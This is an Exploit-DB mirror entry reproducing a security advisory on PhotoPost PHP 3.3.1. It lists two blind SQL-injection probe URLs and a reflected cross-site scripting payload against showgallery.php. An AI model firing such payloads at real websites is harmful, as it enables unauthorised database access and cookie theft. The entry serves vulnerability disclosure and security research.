exploit-db-mirror/platforms/php/webapps/33152.txt
Offensive Security 658e0cae3f Updated 05_04_2014
2014-05-04 04:36:23 +00:00

11 lines
777 B
Text
Executable file

source: http://www.securityfocus.com/bid/35996/info
PhotoPost PHP is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PhotoPost PHP 3.3.1 is vulnerable; other versions may also be affected.
http://www.example.com/showgallery.php?cat=[nr] and substring(@@version,1,1)=4 <= True
http://www.example.com/showgallery.php?cat=[nr] and substring(@@version,1,1)=5 <= False
http://www.example.com/showgallery.php?cat=&#039;"><script>alert(&#039;xss&#039;)</script>